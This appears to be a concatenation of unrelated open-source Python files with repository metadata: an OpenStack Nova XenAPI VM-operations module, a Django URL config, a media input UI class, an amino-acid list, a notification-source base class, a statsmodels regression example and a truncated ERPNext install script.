vm_ref = self._get_vm_opaque_ref(instance)
self._session.call_xenapi('VM.unpause', vm_ref)
def suspend(self, instance):
"""Suspend the specified instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._acquire_bootlock(vm_ref)
self._session.call_xenapi('VM.suspend', vm_ref)
def resume(self, instance):
"""Resume the specified instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._release_bootlock(vm_ref)
self._session.call_xenapi('VM.resume', vm_ref, False, True)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Rescue the specified instance.
- shutdown the instance VM.
- set 'bootlock' to prevent the instance from starting in rescue.
- spawn a rescue VM (the vm name-label will be instance-N-rescue).
"""
rescue_name_label = '%s-rescue' % instance['name']
rescue_vm_ref = vm_utils.lookup(self._session, rescue_name_label)
if rescue_vm_ref:
raise RuntimeError(_("Instance is already in Rescue Mode: %s")
% instance['name'])
vm_ref = self._get_vm_opaque_ref(instance)
vm_utils.hard_shutdown_vm(self._session, instance, vm_ref)
self._acquire_bootlock(vm_ref)
self.spawn(context, instance, image_meta, [], rescue_password,
network_info, name_label=rescue_name_label, rescue=True)
def unrescue(self, instance):
"""Unrescue the specified instance.
- unplug the instance VM's disk from the rescue VM.
- teardown the rescue VM.
- release the bootlock to allow the instance VM to start.
"""
rescue_vm_ref = vm_utils.lookup(self._session,
"%s-rescue" % instance['name'])
if not rescue_vm_ref:
raise exception.InstanceNotInRescueMode(
instance_id=instance['uuid'])
original_vm_ref = self._get_vm_opaque_ref(instance)
self._destroy_rescue_instance(rescue_vm_ref, original_vm_ref)
self._release_bootlock(original_vm_ref)
self._start(instance, original_vm_ref)
def soft_delete(self, instance):
"""Soft delete the specified instance."""
try:
vm_ref = self._get_vm_opaque_ref(instance)
except exception.NotFound:
LOG.warning(_("VM is not present, skipping soft delete..."),
instance=instance)
else:
vm_utils.hard_shutdown_vm(self._session, instance, vm_ref)
self._acquire_bootlock(vm_ref)
def restore(self, instance):
"""Restore the specified instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._release_bootlock(vm_ref)
self._start(instance, vm_ref)
def power_off(self, instance):
"""Power off the specified instance."""
vm_ref = self._get_vm_opaque_ref(instance)
vm_utils.hard_shutdown_vm(self._session, instance, vm_ref)
def power_on(self, instance):
"""Power on the specified instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._start(instance, vm_ref)
def _cancel_stale_tasks(self, timeout, task):
"""Cancel the given tasks that are older than the given timeout."""
task_refs = self._session.call_xenapi("task.get_by_name_label", task)
for task_ref in task_refs:
task_rec = self._session.call_xenapi("task.get_record", task_ref)
task_created = timeutils.parse_strtime(task_rec["created"].value,
"%Y%m%dT%H:%M:%SZ")
if timeutils.is_older_than(task_created, timeout):
self._session.call_xenapi("task.cancel", task_ref)
def poll_rebooting_instances(self, timeout, instances):
"""Look for expirable rebooting instances.
- issue a "hard" reboot to any instance that has been stuck in a
reboot state for >= the given timeout
"""
# NOTE(jk0): All existing clean_reboot tasks must be cancelled before
# we can kick off the hard_reboot tasks.
self._cancel_stale_tasks(timeout, 'VM.clean_reboot')
ctxt = nova_context.get_admin_context()
instances_info = dict(instance_count=len(instances),
timeout=timeout)
if instances_info["instance_count"] > 0:
LOG.info(_("Found %(instance_count)d hung reboots "
"older than %(timeout)d seconds") % instances_info)
for instance in instances:
LOG.info(_("Automatically hard rebooting"), instance=instance)
self.compute_api.reboot(ctxt, instance, "HARD")
def get_info(self, instance, vm_ref=None):
"""Return data about VM instance."""
vm_ref = vm_ref or self._get_vm_opaque_ref(instance)
vm_rec = self._session.call_xenapi("VM.get_record", vm_ref)
return vm_utils.compile_info(vm_rec)
def get_diagnostics(self, instance):
"""Return data about VM diagnostics."""
vm_ref = self._get_vm_opaque_ref(instance)
vm_rec = self._session.call_xenapi("VM.get_record", vm_ref)
return vm_utils.compile_diagnostics(vm_rec)
def _get_vifs_for_instance(self, vm_rec):
return [self._session.call_xenapi("VIF.get_record", vrec)
for vrec in vm_rec['VIFs']]
def _get_vif_device_map(self, vm_rec):
vif_map = {}
for vif in self._get_vifs_for_instance(vm_rec):
vif_map[vif['device']] = vif['MAC']
return vif_map
def get_all_bw_counters(self):
"""Return running bandwidth counter for each interface on each
running VM"""
counters = vm_utils.fetch_bandwidth(self._session)
bw = {}
for vm_ref, vm_rec in vm_utils.list_vms(self._session):
vif_map = self._get_vif_device_map(vm_rec)
name = vm_rec['name_label']
if 'nova_uuid' not in vm_rec['other_config']:
continue
dom = vm_rec.get('domid')
if dom is None or dom not in counters:
continue
vifs_bw = bw.setdefault(name, {})
for vif_num, vif_data in counters[dom].iteritems():
mac = vif_map[vif_num]
vif_data['mac_address'] = mac
vifs_bw[mac] = vif_data
return bw
def get_console_output(self, instance):
"""Return snapshot of console."""
# TODO(armando-migliaccio): implement this to fix pylint!
return 'FAKE CONSOLE OUTPUT of instance'
def get_vnc_console(self, instance):
"""Return connection info for a vnc console."""
if instance['vm_state'] == vm_states.RESCUED:
name = '%s-rescue' % instance['name']
vm_ref = vm_utils.lookup(self._session, name)
if vm_ref is None:
# The rescue instance might not be ready at this point.
raise exception.InstanceNotReady(instance_id=instance['uuid'])
else:
vm_ref = vm_utils.lookup(self._session, instance['name'])
if vm_ref is None:
# The compute manager expects InstanceNotFound for this case.
raise exception.InstanceNotFound(instance_id=instance['uuid'])
session_id = self._session.get_session_id()
path = "/console?ref=%s&session_id=%s" % (str(vm_ref), session_id)
# NOTE: XS5.6sp2+ use http over port 80 for xenapi communication
return {'host': CONF.vncserver_proxyclient_address, 'port': 80,
'internal_access_path': path}
def _vif_xenstore_data(self, vif):
"""convert a network info vif to injectable instance data."""
def get_ip(ip):
if not ip:
return None
return ip['address']
def fixed_ip_dict(ip, subnet):
if ip['version'] == 4:
netmask = str(subnet.as_netaddr().netmask)
else:
netmask = subnet.as_netaddr()._prefixlen
return {'ip': ip['address'],
'enabled': '1',
'netmask': netmask,
'gateway': get_ip(subnet['gateway'])}
def convert_route(route):
return {'route': str(netaddr.IPNetwork(route['cidr']).network),
'netmask': str(netaddr.IPNetwork(route['cidr']).netmask),
'gateway': get_ip(route['gateway'])}
network = vif['network']
v4_subnets = [subnet for subnet in network['subnets']
if subnet['version'] == 4]
v6_subnets = [subnet for subnet in network['subnets']
if subnet['version'] == 6]
# NOTE(tr3buchet): routes and DNS come from all subnets
routes = [convert_route(route) for subnet in network['subnets']
for route in subnet['routes']]
dns = [get_ip(ip) for subnet in network['subnets']
for ip in subnet['dns']]
info_dict = {'label': network['label'],
'mac': vif['address']}
if v4_subnets:
# NOTE(tr3buchet): gateway and broadcast from first subnet
# primary IP will be from first subnet
# subnets are generally unordered :(
info_dict['gateway'] = get_ip(v4_subnets[0]['gateway'])
info_dict['broadcast'] = str(v4_subnets[0].as_netaddr().broadcast)
info_dict['ips'] = [fixed_ip_dict(ip, subnet)
for subnet in v4_subnets
for ip in subnet['ips']]
if v6_subnets:
# NOTE(tr3buchet): gateway from first subnet
# primary IP will be from first subnet
# subnets are generally unordered :(
info_dict['gateway_v6'] = get_ip(v6_subnets[0]['gateway'])
info_dict['ip6s'] = [fixed_ip_dict(ip, subnet)
for subnet in v6_subnets
for ip in subnet['ips']]
if routes:
info_dict['routes'] = routes
if dns:
info_dict['dns'] = list(set(dns))
return info_dict
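# NOTE (editor): illustrative example, not part of the original driver.
# For a vif with a single IPv4 subnet, the info_dict built above would look
# roughly like this (addresses and MAC are made-up values):
#   {'label': 'public',
#    'mac': 'aa:bb:cc:dd:ee:ff',
#    'gateway': '10.0.0.1',
#    'broadcast': '10.0.0.255',
#    'ips': [{'ip': '10.0.0.2', 'enabled': '1',
#             'netmask': '255.255.255.0', 'gateway': '10.0.0.1'}],
#    'dns': ['8.8.8.8']}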
def _remove_vif_from_network_info(self, instance, vm_ref, mac):
location = ('vm-data/networking/%s' % mac.replace(':', ''))
self._remove_from_param_xenstore(vm_ref, location)
try:
self._delete_from_xenstore(instance, location,
vm_ref=vm_ref)
except KeyError:
# catch KeyError for domid if instance isn't running
pass
def inject_network_info(self, instance, network_info, vm_ref=None):
"""
Generate the network info and make calls to place it into the
xenstore and the xenstore param list.
vm_ref can be passed in because it will sometimes be different than
what vm_utils.lookup(session, instance['name']) will find (ex: rescue)
"""
vm_ref = vm_ref or self._get_vm_opaque_ref(instance)
LOG.debug(_("Injecting network info to xenstore"), instance=instance)
for vif in network_info:
xs_data = self._vif_xenstore_data(vif)
location = ('vm-data/networking/%s' %
vif['address'].replace(':', ''))
self._add_to_param_xenstore(vm_ref,
location,
jsonutils.dumps(xs_data))
try:
self._write_to_xenstore(instance, location, xs_data,
vm_ref=vm_ref)
except KeyError:
# catch KeyError for domid if instance isn't running
pass
def _get_highest_vif_device_id(self, vm_rec):
"""Enumerates all the VIFs and gets the next highest device id."""
max_device = -1
for device, vif in self._get_vif_device_map(vm_rec).iteritems():
max_device = max(int(device), max_device)
return max_device + 1
def create_vif_for_instance(self, instance, vif_info, hotplug):
vm_ref = vm_utils.lookup(self._session, instance["name"])
vm_rec = self._session.call_xenapi("VM.get_record", vm_ref)
device = self._get_highest_vif_device_id(vm_rec)
vif_rec = self.vif_driver.plug(instance, vif_info,
vm_ref=vm_ref, device=device)
vif_ref = self._session.call_xenapi('VIF.create', vif_rec)
if hotplug:
self._session.call_xenapi('VIF.plug', vif_ref)
return vif_ref
def delete_vif_for_instance(self, instance, vif, hot_unplug):
vm_ref = vm_utils.lookup(self._session, instance["name"])
vm_rec = self._session.call_xenapi("VM.get_record", vm_ref)
for vif_rec in self._get_vifs_for_instance(vm_rec):
if vif_rec["MAC"] == vif["mac_address"]:
vif_ref = self._session.call_xenapi("VIF.get_by_uuid",
vif_rec["uuid"])
if hot_unplug:
self._session.call_xenapi("VIF.unplug", vif_ref)
self._session.call_xenapi("VIF.destroy", vif_ref)
self._remove_vif_from_network_info(instance, vm_ref,
vif["mac_address"])
return
raise Exception(_("No VIF found for instance %s") % instance["uuid"])
def _create_vifs(self, vm_ref, instance, network_info):
"""Creates vifs for an instance."""
LOG.debug(_("Creating vifs"), instance=instance)
# this function raises if vm_ref is not a vm_opaque_ref
self._session.call_xenapi("VM.get_record", vm_ref)
for device, vif in enumerate(network_info):
vif_rec = self.vif_driver.plug(instance, vif,
vm_ref=vm_ref, device=device)
network_ref = vif_rec['network']
LOG.debug(_('Creating VIF for network %(network_ref)s'),
locals(), instance=instance)
vif_ref = self._session.call_xenapi('VIF.create', vif_rec)
LOG.debug(_('Created VIF %(vif_ref)s, network %(network_ref)s'),
locals(), instance=instance)
def plug_vifs(self, instance, network_info):
"""Set up VIF networking on the host."""
for device, vif in enumerate(network_info):
self.vif_driver.plug(instance, vif, device=device)
def unplug_vifs(self, instance, network_info):
if network_info:
for vif in network_info:
self.vif_driver.unplug(instance, vif)
def reset_network(self, instance):
"""Calls resetnetwork method in agent."""
if self.agent_enabled:
vm_ref = self._get_vm_opaque_ref(instance)
agent = self._get_agent(instance, vm_ref)
agent.resetnetwork()
else:
raise NotImplementedError()
def inject_hostname(self, instance, vm_ref, hostname):
"""Inject the hostname of the instance into the xenstore."""
if instance['os_type'] == "windows":
# NOTE(jk0): Windows hostnames can only be <= 15 chars.
hostname = hostname[:15]
LOG.debug(_("Injecting hostname to xenstore"), instance=instance)
self._add_to_param_xenstore(vm_ref, 'vm-data/hostname', hostname)
def inject_provider_data(self, instance, vm_ref, context):
"""Inject provider data for the instance into the xenstore."""
# Store region and roles
self._add_to_param_xenstore(vm_ref, 'vm-data/provider_data/provider',
CONF.provider or '')
self._add_to_param_xenstore(vm_ref, 'vm-data/provider_data/region',
CONF.region or '')
self._add_to_param_xenstore(vm_ref, 'vm-data/provider_data/roles',
jsonutils.dumps(context.roles))
# Now build up the IP whitelist data
location = 'vm-data/provider_data/ip_whitelist'
self._add_to_param_xenstore(vm_ref, location, '')
if CONF.ip_whitelist_file:
idx = 0
with open(CONF.ip_whitelist_file) as f:
for entry in f:
entry = entry.strip()
# Skip blank lines and comments
if not entry or entry[0] == '#':
continue
self._add_to_param_xenstore(vm_ref, '%s/%s' %
(location, idx), entry)
idx += 1
def _write_to_xenstore(self, instance, path, value, vm_ref=None):
"""
Writes the passed value to the xenstore record for the given VM
at the specified location. A XenAPIPlugin.PluginError will be raised
if any error is encountered in the write process.
"""
return self._make_plugin_call('xenstore.py', 'write_record', instance,
vm_ref=vm_ref, path=path,
value=jsonutils.dumps(value))
def _delete_from_xenstore(self, instance, path, vm_ref=None):
"""
Deletes the value from the xenstore record for the given VM at
the specified location. A XenAPIPlugin.PluginError will be
raised if any error is encountered in the delete process.
"""
return self._make_plugin_call('xenstore.py', 'delete_record', instance,
vm_ref=vm_ref, path=path)
def _make_plugin_call(self, plugin, method, instance=None, vm_ref=None,
**addl_args):
"""
Abstracts out the process of calling a method of a xenapi plugin.
Any errors raised by the plugin will in turn raise a RuntimeError here.
"""
args = {}
if instance or vm_ref:
vm_ref = vm_ref or self._get_vm_opaque_ref(instance)
vm_rec = self._session.call_xenapi("VM.get_record", vm_ref)
args['dom_id'] = vm_rec['domid']
args.update(addl_args)
try:
return self._session.call_plugin(plugin, method, args)
except self._session.XenAPI.Failure as e:
err_msg = e.details[-1].splitlines()[-1]
if 'TIMEOUT:' in err_msg:
LOG.error(_('TIMEOUT: The call to %(method)s timed out. '
'args=%(args)r'), locals(), instance=instance)
return {'returncode': 'timeout', 'message': err_msg}
elif 'NOT IMPLEMENTED:' in err_msg:
LOG.error(_('NOT IMPLEMENTED: The call to %(method)s is not'
' supported by the agent. args=%(args)r'),
locals(), instance=instance)
return {'returncode': 'notimplemented', 'message': err_msg}
else:
LOG.error(_('The call to %(method)s returned an error: %(e)s. '
'args=%(args)r'), locals(), instance=instance)
return {'returncode': 'error', 'message': err_msg}
return None
def _add_to_param_xenstore(self, vm_ref, key, val):
"""
Takes a key/value pair and adds it to the xenstore parameter
record for the given vm instance. If the key exists in xenstore,
it is overwritten
"""
self._remove_from_param_xenstore(vm_ref, key)
self._session.call_xenapi('VM.add_to_xenstore_data', vm_ref, key, val)
def _remove_from_param_xenstore(self, vm_ref, key):
"""
Takes a single key and removes it from the xenstore parameter
record data for the given VM.
If the key doesn't exist, the request is ignored.
"""
self._session.call_xenapi('VM.remove_from_xenstore_data', vm_ref, key)
def refresh_security_group_rules(self, security_group_id):
"""recreates security group rules for every instance."""
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
"""recreates security group rules for every instance."""
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
"""recreates security group rules for specified instance."""
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def unfilter_instance(self, instance_ref, network_info):
"""Removes filters for each VIF of the specified instance."""
self.firewall_driver.unfilter_instance(instance_ref,
network_info=network_info)
def _get_host_uuid_from_aggregate(self, context, hostname):
current_aggregate = self._virtapi.aggregate_get_by_host(
context, CONF.host, key=pool_states.POOL_FLAG)[0]
if not current_aggregate:
raise exception.AggregateHostNotFound(host=CONF.host)
try:
return current_aggregate.metadetails[hostname]
except KeyError:
reason = _('Destination host:%(hostname)s must be in the same '
'aggregate as the source server')
raise exception.MigrationPreCheckError(reason=reason % locals())
def _ensure_host_in_aggregate(self, context, hostname):
self._get_host_uuid_from_aggregate(context, hostname)
def _get_host_opaque_ref(self, context, hostname):
host_uuid = self._get_host_uuid_from_aggregate(context, hostname)
return self._session.call_xenapi("host.get_by_uuid", host_uuid)
def _migrate_receive(self, ctxt):
destref = self._session.get_xenapi_host()
# Get the network to use for the migration.
# This is the one associated with the pif marked management. From cli:
# uuid=`xe pif-list --minimal management=true`
# xe pif-param-get param-name=network-uuid uuid=$uuid
expr = 'field "management" = "true"'
pifs = self._session.call_xenapi('PIF.get_all_records_where',
expr)
if len(pifs) != 1:
msg = _('No suitable network for migrate')
raise exception.MigrationPreCheckError(reason=msg)
nwref = pifs[pifs.keys()[0]]['network']
try:
options = {}
migrate_data = self._session.call_xenapi("host.migrate_receive",
destref,
nwref,
options)
except self._session.XenAPI.Failure as exc:
LOG.exception(exc)
msg = _('Migrate Receive failed')
raise exception.MigrationPreCheckError(reason=msg)
return migrate_data
def _get_iscsi_srs(self, ctxt, instance_ref):
vm_ref = self._get_vm_opaque_ref(instance_ref)
vbd_refs = self._session.call_xenapi("VM.get_VBDs", vm_ref)
iscsi_srs = []
for vbd_ref in vbd_refs:
vdi_ref = self._session.call_xenapi("VBD.get_VDI", vbd_ref)
# Check if it's on an iSCSI SR
sr_ref = self._session.call_xenapi("VDI.get_SR", vdi_ref)
if self._session.call_xenapi("SR.get_type", sr_ref) == 'iscsi':
iscsi_srs.append(sr_ref)
return iscsi_srs
def check_can_live_migrate_destination(self, ctxt, instance_ref,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
"""
dest_check_data = {}
if block_migration:
migrate_send_data = self._migrate_receive(ctxt)
destination_sr_ref = vm_utils.safe_find_sr(self._session)
dest_check_data.update(
{"block_migration": block_migration,
"migrate_data": {"migrate_send_data": migrate_send_data,
"destination_sr_ref": destination_sr_ref}})
else:
src = instance_ref['host']
self._ensure_host_in_aggregate(ctxt, src)
# TODO(johngarbutt) we currently assume
# instance is on a SR shared with other destination
# block migration work will be able to resolve this
return dest_check_data
def _is_xsm_sr_check_relaxed(self):
try:
return self.cached_xsm_sr_relaxed
except AttributeError:
config_value = None
try:
config_value = self._make_plugin_call('config_file',
'get_val',
key='relax-xsm-sr-check')
except Exception as exc:
LOG.exception(exc)
self.cached_xsm_sr_relaxed = config_value == "true"
return self.cached_xsm_sr_relaxed
def check_can_live_migrate_source(self, ctxt, instance_ref,
dest_check_data):
"""Check if it's possible to execute live migration on the source side.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest_check_data: data returned by the check on the
destination, includes block_migration flag
"""
if len(self._get_iscsi_srs(ctxt, instance_ref)) > 0:
# XAPI must support the relaxed SR check for live migrating with
# iSCSI VBDs
if not self._is_xsm_sr_check_relaxed():
raise exception.MigrationError(_('XAPI supporting '
'relax-xsm-sr-check=true required'))
if 'migrate_data' in dest_check_data:
vm_ref = self._get_vm_opaque_ref(instance_ref)
migrate_data = dest_check_data['migrate_data']
try:
self._call_live_migrate_command(
"VM.assert_can_migrate", vm_ref, migrate_data)
except self._session.XenAPI.Failure as exc:
LOG.exception(exc)
msg = _('VM.assert_can_migrate failed')
raise exception.MigrationPreCheckError(reason=msg)
return dest_check_data
def _generate_vdi_map(self, destination_sr_ref, vm_ref, sr_ref=None):
"""generate a vdi_map for _call_live_migrate_command."""
if sr_ref is None:
sr_ref = vm_utils.safe_find_sr(self._session)
vm_vdis = vm_utils.get_instance_vdis_for_sr(self._session,
vm_ref, sr_ref)
return dict((vdi, destination_sr_ref) for vdi in vm_vdis)
def _call_live_migrate_command(self, command_name, vm_ref, migrate_data):
"""unpack xapi specific parameters, and call a live migrate command."""
destination_sr_ref = migrate_data['destination_sr_ref']
migrate_send_data = migrate_data['migrate_send_data']
vdi_map = self._generate_vdi_map(destination_sr_ref, vm_ref)
# Add destination SR refs for all of the VDIs that we created
# as part of the pre migration callback
if 'pre_live_migration_result' in migrate_data:
pre_migrate_data = migrate_data['pre_live_migration_result']
sr_uuid_map = pre_migrate_data.get('sr_uuid_map', [])
for sr_uuid in sr_uuid_map:
# Source and destination SRs have the same UUID, so get the
# reference for the local SR
sr_ref = self._session.call_xenapi("SR.get_by_uuid", sr_uuid)
vdi_map.update(
self._generate_vdi_map(
sr_uuid_map[sr_uuid], vm_ref, sr_ref))
vif_map = {}
options = {}
self._session.call_xenapi(command_name, vm_ref,
migrate_send_data, True,
vdi_map, vif_map, options)
def live_migrate(self, context, instance, destination_hostname,
post_method, recover_method, block_migration,
migrate_data=None):
try:
vm_ref = self._get_vm_opaque_ref(instance)
if block_migration:
if not migrate_data:
raise exception.InvalidParameterValue('Block Migration '
'requires migrate data from destination')
iscsi_srs = self._get_iscsi_srs(context, instance)
try:
self._call_live_migrate_command(
"VM.migrate_send", vm_ref, migrate_data)
except self._session.XenAPI.Failure as exc:
LOG.exception(exc)
raise exception.MigrationError(_('Migrate Send failed'))
# Tidy up the iSCSI SRs
for sr_ref in iscsi_srs:
volume_utils.forget_sr(self._session, sr_ref)
else:
host_ref = self._get_host_opaque_ref(context,
destination_hostname)
self._session.call_xenapi("VM.pool_migrate", vm_ref,
host_ref, {})
post_method(context, instance, destination_hostname,
block_migration)
except Exception:
with excutils.save_and_reraise_exception():
recover_method(context, instance, destination_hostname,
block_migration)
def get_per_instance_usage(self):
"""Get usage info about each active instance."""
usage = {}
def _is_active(vm_rec):
power_state = vm_rec['power_state'].lower()
return power_state in ['running', 'paused']
def _get_uuid(vm_rec):
other_config = vm_rec['other_config']
return other_config.get('nova_uuid', None)
for vm_ref, vm_rec in vm_utils.list_vms(self._session):
uuid = _get_uuid(vm_rec)
if _is_active(vm_rec) and uuid is not None:
memory_mb = int(vm_rec['memory_static_max']) / 1024 / 1024
usage[uuid] = {'memory_mb': memory_mb, 'uuid': uuid}
return usage
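# NOTE (editor): illustrative example, not part of the original driver.
# The returned mapping is keyed by instance uuid; with made-up values it
# would look like:
#   {'c7f3e1...': {'memory_mb': 2048, 'uuid': 'c7f3e1...'}}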
def attach_block_device_volumes(self, block_device_info):
sr_uuid_map = {}
try:
if block_device_info is not None:
for block_device_map in block_device_info[
'block_device_mapping']:
sr_uuid, _ = self._volumeops.attach_volume(
block_device_map['connection_info'],
None,
block_device_map['mount_device'],
hotplug=False)
sr_ref = self._session.call_xenapi('SR.get_by_uuid',
sr_uuid)
sr_uuid_map[sr_uuid] = sr_ref
except Exception:
with excutils.save_and_reraise_exception():
# Disconnect the volumes we just connected
for sr in sr_uuid_map:
volume_utils.forget_sr(self._session, sr_uuid_map[sr])
return sr_uuid_map
|
sridevikoushik31/nova
|
nova/virt/xenapi/vmops.py
|
Python
|
apache-2.0
| 88,390
| 0.000645
|
from django.conf.urls import patterns, url
urlpatterns = patterns('',
url(r'^$', 'recollect.views.home', name='home'),
url(r'^albums$', 'recollect.views.albums', name='albums'),
url(r'^album/(?P<album_slug>[A-z0-9-]+)$', 'recollect.views.album', name='album'),
)
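# NOTE (editor): illustrative example, not part of the original file.
# Assuming these patterns are included at the site root, the named URLs
# reverse as follows (slug value is made up):
#   reverse('albums')                                     -> '/albums'
#   reverse('album', kwargs={'album_slug': 'abbey-road'}) -> '/album/abbey-road'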
|
richbs/django-record-collector
|
recollect/urls.py
|
Python
|
bsd-3-clause
| 275
| 0.007273
|
# -*- coding: utf-8 -*-
# Copyright (C) 2010 Holoscópio Tecnologia
# Author: Luciana Fujii Pontello <luciana@holoscopio.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import gobject
import gtk
from sltv.settings import UI_DIR
from core import InputUI
class AutoAudioInputUI(InputUI):
def __init__(self):
InputUI.__init__(self)
def get_widget(self):
return None
def get_name(self):
return "AutoAudio"
def get_description(self):
return "Auto Audio Source"
|
Geheimorganisation/sltv
|
sltv/ui/input/autoaudioinput.py
|
Python
|
gpl-2.0
| 1,172
| 0.000854
|
"""
Author: Eric J. Ma
License: MIT
A Python module that provides helper functions and variables for encoding amino
acid features in the protein interaction network. We encode features in order
to feed the data into the neural fingerprinting software later on.
"""
amino_acids = [
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M",
"N",
"P",
"Q",
"R",
"S",
"T",
"V",
"W",
"X",
"Y",
"Z",
]
|
ericmjl/protein-interaction-network
|
proteingraph/features.py
|
Python
|
mit
| 501
| 0
|
from abc import ABCMeta, abstractmethod
class NotificationSource():
"""
Abstract class for all notification sources.
"""
__metaclass__ = ABCMeta
@abstractmethod
def poll(self):
"""
Used to get a set of changes between data retrieved in this call and the last.
"""
raise NotImplementedError('No concrete implementation!')
@abstractmethod
def name(self):
"""
Returns a unique name for the source type.
"""
raise NotImplementedError('No concrete implementation!')
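# NOTE (editor): illustrative sketch, not part of the original module.
# A minimal concrete source only needs to implement poll() and name():
#
#   class DummySource(NotificationSource):
#       def __init__(self):
#           self._seen = set()
#
#       def poll(self):
#           current = set(['item-a', 'item-b'])   # stand-in for real data
#           changes = current - self._seen
#           self._seen = current
#           return changes
#
#       def name(self):
#           return 'Dummy'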
|
DanNixon/Sakuya
|
pc_client/sakuyaclient/NotificationSource.py
|
Python
|
apache-2.0
| 562
| 0.001779
|
# -*- coding: utf-8 -*-
"""Example: Test for equality of coefficients across groups/regressions
Created on Sat Mar 27 22:36:51 2010
Author: josef-pktd
"""
import numpy as np
from scipy import stats
#from numpy.testing import assert_almost_equal
import scikits.statsmodels as sm
from scikits.statsmodels.sandbox.regression.onewaygls import OneWayLS
#choose example
#--------------
example = ['null', 'diff'][1] #null: identical coefficients across groups
example_size = [10, 100][0]
example_size = [(10,2), (100,2)][0]
example_groups = ['2', '2-2'][1]
#'2-2': 4 groups,
# groups 0 and 1 and groups 2 and 3 have identical parameters in DGP
#generate example
#----------------
np.random.seed(87654589)
nobs, nvars = example_size
x1 = np.random.normal(size=(nobs, nvars))
y1 = 10 + np.dot(x1,[15.]*nvars) + 2*np.random.normal(size=nobs)
x1 = sm.add_constant(x1) #, prepend=True)
#assert_almost_equal(x1, np.vander(x1[:,0],2), 16)
#res1 = sm.OLS(y1, x1).fit()
#print res1.params
#print np.polyfit(x1[:,0], y1, 1)
#assert_almost_equal(res1.params, np.polyfit(x1[:,0], y1, 1), 14)
#print res1.summary(xname=['x1','const1'])
#regression 2
x2 = np.random.normal(size=(nobs,nvars))
if example == 'null':
y2 = 10 + np.dot(x2,[15.]*nvars) + 2*np.random.normal(size=nobs) # if H0 is true
else:
y2 = 19 + np.dot(x2,[17.]*nvars) + 2*np.random.normal(size=nobs)
x2 = sm.add_constant(x2)
# stack
x = np.concatenate((x1,x2),0)
y = np.concatenate((y1,y2))
if example_groups == '2':
groupind = (np.arange(2*nobs)>nobs-1).astype(int)
else:
groupind = np.mod(np.arange(2*nobs),4)
groupind.sort()
#x = np.column_stack((x,x*groupind[:,None]))
def print_results(res):
groupind = res.groups
#res.fitjoint() #not really necessary, because called by ftest_summary
ft = res.ftest_summary()
#print ft[0] #skip because table is nicer
print '\nTable of F-tests for overall or pairwise equality of coefficients'
print 'hypothesis F-statistic p-value df_denom df_num reject'
for row in ft[1]:
print row,
if row[1][1]<0.05:
print '*'
else:
print ''
print 'Notes: p-values are not corrected for many tests'
print ' (no Bonferroni correction)'
print ' * : reject at 5% uncorrected confidence level'
print 'Null hypothesis: all or pairwise coefficients are the same'
print 'Alternative hypothesis: all coefficients are different'
print '\nComparison with stats.f_oneway'
print stats.f_oneway(*[y[groupind==gr] for gr in res.unique])
print '\nLikelihood Ratio Test'
print 'likelihood ratio p-value df'
print res.lr_test()
print 'Null model: pooled all coefficients are the same across groups,'
print 'Alternative model: all coefficients are allowed to be different'
print 'not verified but looks close to f-test result'
print '\nOls parameters by group from individual, separate ols regressions'
for group in sorted(res.olsbygroup):
r = res.olsbygroup[group]
print group, r.params
print '\nCheck for heteroscedasticity, '
print 'variance and standard deviation for individual regressions'
print ' '*12, ' '.join('group %-10s' %(gr) for gr in res.unique)
print 'variance ', res.sigmabygroup
print 'standard dev', np.sqrt(res.sigmabygroup)
#get results for example
#-----------------------
print '\nTest for equality of coefficients for all exogenous variables'
print '-------------------------------------------------------------'
res = OneWayLS(y,x, groups=groupind.astype(int))
print_results(res)
print '\n\nOne way ANOVA, constant is the only regressor'
print '---------------------------------------------'
print 'this is the same as scipy.stats.f_oneway'
res = OneWayLS(y,np.ones(len(y)), groups=groupind)
print_results(res)
print '\n\nOne way ANOVA, constant is the only regressor with het is true'
print '--------------------------------------------------------------'
print 'this is the similar to scipy.stats.f_oneway,'
print 'but variance is not assumed to be the same across groups'
res = OneWayLS(y,np.ones(len(y)), groups=groupind, het=True)
print_results(res)
|
matthew-brett/draft-statsmodels
|
scikits/statsmodels/sandbox/examples/ex_onewaygls.py
|
Python
|
bsd-3-clause
| 4,198
| 0.010005
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
default_mail_footer = """<div style="padding: 7px; text-align: right; color: #888"><small>Sent via
<a style="color: #888" href="http://erpnext.org">ERPNext</a></div>"""
def after_install():
frappe.get_doc({'doctype': "Role", "role_name": "Analytics"}).insert()
set_single_defaults()
create_compact_item_print_custom_field()
from frappe.desk.page.setup_wizard.setup_wizard import add_all_roles_to
add_all_roles_to("Administrator")
frappe.db.commit()
def check_setup_wizard_not_completed():
if frappe.db.get_default('desktop:home_page') == 'desktop':
print
print "ERPNext can only be installed on a fresh site where the setup wizard is not completed"
print "You can reinstall this site (after saving your data) using: bench --site [sitename] reinstall"
print
return False
def set_single_defaults():
for dt in frappe.db.sql_list("""select name from `tabDocType` where issingle=1"""):
default_values = frappe.db.sql("""select fieldname, `default` from `tabDocField`
where parent=%s""", dt)
if default_values:
try:
b = frappe.get_doc(dt, dt)
